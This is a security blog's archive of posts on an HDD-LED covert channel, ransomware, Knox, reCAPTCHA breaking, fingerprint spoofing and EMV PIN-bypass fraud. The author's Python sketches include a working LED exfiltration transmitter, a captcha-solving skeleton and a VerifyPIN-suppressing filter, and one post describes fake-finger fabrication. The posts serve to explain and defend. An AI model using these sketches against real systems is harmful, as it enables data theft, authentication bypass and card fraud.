Category Archive: Hack

Feb 23 2017

Malware Lets a Drone Steal Data by Watching a Computer’s Blinking LED

This news, initially published by Wired, has made the headlines of many news sites and blogs. Thus, I had to dive in and read the paper. This team has already disclosed several covert channels in the past, such as temperature. Three researchers, GURI M., ZADOV B., and ELOVICI Y., have devised a new way to breach an air gap. They use the hard-drive (HDD) LED as a covert channel. By reading from the hard drive in a given sequence, it is possible to control the LED without being a privileged user. The reading sequence modulates the emitted light that carries the covert channel.

They experimented with several ordinary computers and concluded that they were able to reach about 4 Kbit/s by reading 4 KB sectors. Obviously, such throughput requires special equipment to record the blinking LED. Typical video cameras will not allow more than about 15 bit/s, depending on their frames per second (fps); do not forget the Nyquist-Shannon sampling theorem. Thus, they used a photodiode or specialized amplified light detectors. Only this kind of equipment can guarantee a good detection rate.
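
To make the mechanism concrete, here is a minimal sketch of such a transmitter for Linux. It is my own reconstruction using simple on-off keying, not the authors' code; the scratch file, bit rate, and cache-eviction trick are illustrative assumptions:

    import os
    import time

    # Sketch: on-off keying over the HDD LED. A '1' bit is a burst of
    # forced disk reads (LED lit); a '0' bit is idle (LED dark).

    PATH = "/tmp/led_channel.bin"  # hypothetical scratch file on the HDD
    BIT_PERIOD = 0.1               # 10 bit/s, within reach of a camera

    def send_bit(fd: int, bit: int, size: int = 4096) -> None:
        deadline = time.monotonic() + BIT_PERIOD
        if bit:
            while time.monotonic() < deadline:
                # Evict the file from the page cache so the next read
                # really hits the disk and lights the LED.
                os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
                os.lseek(fd, 0, os.SEEK_SET)
                os.read(fd, size)  # 4 KB reads, as in the experiments
        else:
            time.sleep(BIT_PERIOD)  # no disk activity: LED stays dark

    def send_message(bits: str) -> None:
        with open(PATH, "wb") as f:  # create the scratch file
            f.write(os.urandom(4096))
        fd = os.open(PATH, os.O_RDONLY)
        try:
            for b in bits:
                send_bit(fd, int(b))
        finally:
            os.close(fd)

    send_message("10110010")  # leak one covert byte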

Using HDD reads as a covert channel is not a new method. At Black Hat 2008, FILIOL E. et al. disclosed such an attack, but they used the clicking of the HDD, i.e., an acoustic channel, rather than the LED, i.e., an optical channel. Their presentation is an interesting survey of many covert channels.

The new attack is nice, and adding the drone component guarantees the buzz. Nevertheless, I believe it is not as dangerous as publicized. The first issue is the malware itself. The malware has to be the exclusive entity accessing the HDD during the transmission. Indeed, if any concurrent process uses the HDD, it will corrupt the emitted message. Therefore, the researchers recommend turning off disk caching (via drop_caches on Linux). What is the likelihood that an air-gapped computer can run a malware as the exclusive process without being noticed? One characteristic of the malware is that it should be stealthy, and thus it will probably not be alone in accessing the HDD.

The second issue is the synchronization with the spying eyes. The evil maid scenario (or evil drone) does not seem realistic. The malware should execute only while the spy is present; otherwise, it will be noticed (due to its exclusive access to the HDD). The spy cannot signal its presence to the malware, as the malware is air-gapped and thus cannot receive any incoming message. Therefore, either they have to define some rendezvous in advance, or the malware has to run repeatedly over a long period, i.e., reducing its stealthiness. If the spying device is “fixed,” using cameras is not realistic due to their low bandwidth, which would require the malware to run for long periods. Nevertheless, the spy may have installed special equipment that records everything, analyzing the recorded light later and looking for the malware’s sequences whenever the malware wakes up and plays. The spying device will then have to stealthily exfiltrate a far larger recording than the covert message itself, increasing the risk of detection.

The attack is possible but seems more complex than publicized. The paper’s proposed countermeasures hint at the defense:

Another interesting solution is to execute a background process that frequently invokes random read and write operations; that way, the signal generated by the malicious process will get mixed up with a random noise, limiting the attack’s effectiveness.

As already noted, I believe that in most cases, more than one process will be executing and accessing the HDD. If you are paranoid, you can always hide the LED.
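
Such a decoy could look like the following sketch of the quoted countermeasure. Again, this is only an illustration; the file path, sizes, and timings are my own assumptions:

    import os
    import random
    import time

    # Sketch: keep issuing random reads and writes so that any LED-borne
    # covert signal drowns in noise.

    NOISE_FILE = "/var/tmp/led_noise.bin"  # hypothetical scratch file
    SIZE = 4 * 1024 * 1024                 # 4 MB working area

    def noise_loop() -> None:
        with open(NOISE_FILE, "wb") as f:
            f.write(os.urandom(SIZE))
        fd = os.open(NOISE_FILE, os.O_RDWR)
        try:
            while True:
                offset = random.randrange(0, SIZE - 4096)
                os.lseek(fd, offset, os.SEEK_SET)
                if random.random() < 0.5:
                    # Force a real disk read: the LED blinks randomly.
                    os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
                    os.read(fd, 4096)
                else:
                    os.write(fd, os.urandom(4096))
                    os.fsync(fd)  # push the write to the disk itself
                time.sleep(random.uniform(0.001, 0.05))  # jittered pace
        finally:
            os.close(fd)

    if __name__ == "__main__":
        noise_loop()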

Reference:

Guri, Mordechai, Boris Zadov, and Yuval Elovici. “LED-it-GO: Leaking a Lot of Data from Air-Gapped Computers via the (Small) Hard Drive LED,” February 2017. http://cyber.bgu.ac.il/advanced-cyber/system/files/LED-it-GO_0.pdf

Calmette, Vincent, Stephane Vallet, Eric Filiol, and Guy Le Bouter. “Passive and Active Leakage of Secret Data from Non Networked Computer.” Black Hat 2008, Las Vegas, NV, USA, 2008. https://www.researchgate.net/publication/228801499_Passive_and_Active_Leakage_of_Secret_Data_from_Non_Networked_Computer

Nov 20 2016

Law 7 – You Are the Weakest Link

This post is the seventh in a series of ten. The previous post explored the sixth law: Security is no stronger than its weakest link. Although often neglected, the seventh law is fundamental. It states that human users are often the weakest element of security.

Humans are the weakest link for many reasons. Often, they do not understand security or have a distorted perception of it. For instance, security is often seen as an obstacle. Therefore, users will circumvent it when it obstructs the fulfillment of their task, and they will not apply security policies and procedures. Nor do they believe that they are a worthwhile target for cyber-attacks.

Humans are the weakest link because they do not grasp the full impact of their security-related decisions. How many people ignore the security warnings of their browser? How many people understand the security consequences and constraints of Bring Your Own Device (BYOD) or Bring Your Own Cloud (BYOC)? Employees put their company at risk through bad decisions.

Humans are the weakest link because they have intrinsic limitations. Human memory is often feeble; thus, we end up with weak passwords, or complex passwords written on a Post-it note. Humans do not handle complexity well. Unfortunately, security is too complex.

Humans are the weakest link because they can be easily deceived.  Social engineers use social interaction to influence people and convince them to perform actions that they are not expected to do, or to share information that they are not supposed to disclose.   For instance, phishing is an efficient contamination vector.

How can we mitigate the human risk?

  • Where possible, make decisions on behalf of the end user; as end users are not necessarily able to make rational decisions on security issues, the designer should decide for them whenever possible. When the user does have to decide, the consequences of the decision should be made clear to guide the choice.
  • Define secure defaults; the default value should always correspond to the highest, or at least an acceptable, security level. Security, not user-friendliness, should drive the default value (see the sketch after this list).
  • Educate your employees; the best answer to social engineering is enabling employees to identify an ongoing social engineering attack. Such detection is only possible by educating employees about this kind of attack. Training employees increases their security awareness and thus raises their engagement.
  • Train your security staff; the landscape of security threats and defense tools is changing quickly. Skilled attackers will use the latest exploits. Therefore, it is imperative that the security personnel be aware of the latest techniques. Operational security staff should have a significant part of their work time dedicated to continuous training.
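
To illustrate the secure-defaults point, here is a small, made-up example in which the safe behavior costs the caller nothing, while opting out is explicit. The function and its parameters are mine, not from any particular product:

    import ssl
    import urllib.request

    # Made-up example of a secure default: TLS certificate verification
    # is on unless the caller explicitly, and visibly, opts out.

    def fetch(url: str, verify_tls: bool = True) -> bytes:
        if verify_tls:
            ctx = ssl.create_default_context()  # full verification
        else:
            # Opting out must be loud and deliberate, never the default.
            ctx = ssl._create_unverified_context()
        with urllib.request.urlopen(url, context=ctx) as resp:
            return resp.read()

    data = fetch("https://example.com")  # the secure path costs nothing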

Interestingly, with the current progress of Artificial Intelligence and Big Data analytics, will the new generation of security tools partly compensate for this weakness?

If you find this post interesting, you may also be interested in my second book, “Ten Laws for Security,” which will be available at the end of this month. Chapter 8 explores this law in detail. The book will be available, for instance, from Springer or Amazon.

Jul 06 2016

An insight into Knox

For its Galaxy devices, Samsung provides Knox, an enterprise mobile security solution. Among its features, Knox offers Workspace, which compartmentalizes the mobile device into two spaces: the user space and the Knox space. Of course, the Knox space runs in TrustZone™ and executes only authenticated trusted applications. There is not much public information about the actual implementation of Knox.

Uri Kanonov and Avishai Wool have lifted a part of the veil by reverse engineering Knox 1.0. Their paper provides an interesting, in-depth description of some security mechanisms, such as compartmentalization (based on SELinux) or the encrypted file system. They also disclose some vulnerabilities. The last section describes some enhancements available in Knox 2.3, as well as some remaining issues.

An interesting element of the paper is the list of lessons:

  • Component reuse is welcome, provided the added attack surface is properly protected.
  • Protect the software code of secure components.
  • Validating the applications authorized to run in TrustZone is key for security.
  • A hardware Root of Trust should be at the root of any secure container system.
  • Avoid resource sharing; it increases the attack surface.
  • Check the integrity of the secure container periodically; checking only at boot time is insufficient (a minimal sketch follows this list).
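
As an illustration of the last lesson, a trivial run-time watchdog could periodically re-hash the container image and compare it against a known-good digest. This sketch is mine; the path, interval, and provisioning of the reference digest are assumptions:

    import hashlib
    import time

    CONTAINER_IMAGE = "/data/secure_container.img"   # hypothetical path
    REFERENCE_DIGEST = "<provisioned at build time>" # known-good SHA-256
    CHECK_INTERVAL = 60                              # seconds

    def digest(path: str) -> str:
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    def watchdog() -> None:
        # Re-check periodically; verifying only at boot leaves the whole
        # uptime window for an attacker to tamper with the container.
        while True:
            if digest(CONTAINER_IMAGE) != REFERENCE_DIGEST:
                raise SystemExit("container integrity violation")
            time.sleep(CHECK_INTERVAL)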

If you want to learn more about Knox, this paper is a good read.

Kanonov, Uri, and Avishai Wool. “Secure Containers in Android: The Samsung KNOX Case Study.” arXiv, May 27, 2016. http://arxiv.org/abs/1605.08567.

May 10 2016

A “charitable” ransomware

This is not a joke. Heimdal Security disclosed a new variant of ransomware combining CryptoWall 4 and CryptXXX. It has all the usual components of ransomware. The ransom itself is high: five bitcoins (about $2,200), whereas typical ransoms are around $500.

In addition to the exceptional price, the ransomware adds some social engineering tricks. The ransom screen reads: “Your money will be spent for the children charity. So that is mean that You will get a participation in this process too. Many children will receive presents and medical help!”

And: “We trust that you are kind and honest person! Thank You very much! We wish You all the best! Your name will be in the main donors list and will stay in the charity history!”

So do not hesitate to pay; it is for the kiddies ☹

Moreover, there is an additional benefit.

“Also You will have a FREE tech support for solving any PC troubles for 3 years!”

Trust us ☹

Remember the best practices for avoiding ransomware:

  • Back up your computer(s) regularly; use a physical, air-gapped backup rather than a cloud-based one (unless it is kept disconnected). A new generation of ransomware also encrypts remote or cloud-based servers.
  • Do not get infected; do not click on suspicious attachments or links in emails, and avoid ‘suspicious’ websites.
  • Protect your computer(s); keep the OS and the antivirus up to date.

Apr 15 2016

Hacking reCAPTCHA (2)

In 2012, the hacking team DefCon 949 disclosed their method to break Google’s reCaptcha. They used weaknesses in the version dedicated to visually impaired persons. At the end of 2014, Google replaced its letter-warping version with a more user-friendly one, based on recognizing the images illustrating a given object within a set of nine images.

At Black Hat Asia 2016, S. Sivakorn, J. Polakis, and A. Keromytis from Columbia University disclosed a method to break this visual captcha. They used many tools, but the core of the attack is the use of image annotation services, such as Google Reverse Image Search (GRIS) or Clarifai. These tools return a best-guess description of a submitted image, i.e., a list of potential tags. For instance, for the picture of a go-ban illustrating my blog post about AlphaGo, Clarifai returns chess, desktop, strategy, wood, balance, no person, table, and game, whereas GRIS returns go game. The researchers use many tricks to increase efficiency. My preferred one is using GRIS to locate a high-resolution instance of each challenge image, because they discovered that the accuracy of these annotation services decreases with the resolution of the submitted image.
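
Schematically, the core selection step reduces to matching the returned tags against the challenge hint. In the sketch below, annotate() is a hypothetical placeholder for whichever annotation service is queried (GRIS, Clarifai, etc.):

    from typing import List, Set

    def annotate(image_path: str) -> Set[str]:
        # Placeholder: call an image annotation service and return its
        # best-guess tags for the image.
        raise NotImplementedError

    def solve_challenge(hint: str, candidates: List[str]) -> List[int]:
        # Pick the grid positions whose tags overlap the challenge hint,
        # e.g. hint "go game" vs. tags {"chess", "strategy", "game"}.
        hint_words = set(hint.lower().split())
        picks = []
        for i, image in enumerate(candidates):
            tags = {t.lower() for t in annotate(image)}
            if hint_words & tags:
                picks.append(i)
        return picks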

They obtained 70% accuracy against Google’s reCaptcha and 83.5% against Facebook’s version.

Sivakorn, Suphannee, Jason Polakis, and Angelos D. Keromytis. “I’m Not a Human: Breaking the Google reCaptcha.” Presented at Black Hat Asia, Singapore, 2016.


Mar 30 2016

Easier fingerprint spoofing

In September 2013, the German Chaos Computer Club (CCC) demonstrated the first hack of Apple’s TouchID. Since then, they have repeatedly defeated every new version, both from Apple and Samsung. Their solution requires creating a dummy finger, which is a complex, lengthy process. It uses a typical photographic process, with a copy of the actual fingerprint acting as the negative. The master fingerprint is printed onto a transparent sheet at 1,200 dpi. This printed mask is exposed onto photosensitive PCB material. The PCB material is developed, etched, and cleaned to create a mold. A thin coat of graphite spray is applied to improve the capacitive response. Finally, a thin film of white wood glue is smeared into the mold to make it opaque and create the fake finger.

Two researchers (K. CAO and A. JAIN) at Michigan State University disclosed a new method that simplifies the creation of the fake finger. They use conductive ink from AgIC, which sells ink cartridges for Brother printers. Rather than making a rubber finger, they print a conductive 2D image of the fingerprint. And they claim it works. Surprisingly, they scan the user’s fingerprint at 300 dpi, whereas the CCC used 2,400 dpi to defeat the latest sensors.

As fingerprints on mobile devices will be used for more than simple authentication, for instance payment, it will be paramount to come up with a new generation of biometric sensors that also detect the liveness of the scanned subject.

Nov 23 2015

Attackers are smart

In 2010, Steven MURDOCH, Ross ANDERSON, and their team disclosed a weakness in the EMV protocol. Most credit/debit cards equipped with a chip use the EMV (Europay, MasterCard, Visa) protocol. The vulnerability made it possible to bypass the cardholder verification phase for a given category of transactions: the card does not condition transaction authorization on successful cardholder verification. At the time of disclosure, Ross’s team created a proof of concept using an FPGA. The device was bulky; thus, some people downplayed the criticality.

The team of David NACCACHE recently published an interesting paper disclosing exemplary work on a real attack exploiting this vulnerability: “when organized crime applies academic results.” The team performed a non-destructive forensic analysis of forged smart cards that exploited this weakness. The attackers combined, in one plastic smart card body, the chip of a stolen EMV card and a second smart card chip (a FUN card). The FUN chip acted as a man in the middle: it intercepted the communication between the Point of Sale (PoS) and the actual EMV chip and filtered out the VerifyPIN commands. The EMV chip never verified the PIN and thus was not blocked by the presentation of wrong PINs, while, on the other side, the FUN chip acknowledged the PIN to the PoS, which continued the fraudulent transaction.
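
Schematically, the FUN chip’s logic amounts to a one-condition filter over the APDUs exchanged between the PoS and the card. The sketch below renders the behavior described in the paper; the forwarding interface is a placeholder:

    INS_VERIFY = 0x20         # ISO 7816-4 / EMV VERIFY (PIN) instruction
    SW_SUCCESS = b"\x90\x00"  # status word: command completed normally

    def handle_apdu(apdu: bytes, forward_to_card) -> bytes:
        ins = apdu[1]  # APDU layout: CLA INS P1 P2 [Lc data] [Le]
        if ins == INS_VERIFY:
            # Never forward the PIN check: the real chip's wrong-PIN
            # counter stays untouched, and the PoS believes the PIN
            # was verified successfully.
            return SW_SUCCESS
        return forward_to_card(apdu)  # everything else passes through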

Meanwhile, the PoS terminals have been updated to prevent this attack.

This paper is an excellent example of forensic analysis as well as of responsible disclosure: it was published only after the problem had been solved in the field. It also discloses an example of a new potential class of attacks: Chip in the Middle.

Law 1: Attackers will always find their way. Moreover, they even read academic publications and use them.
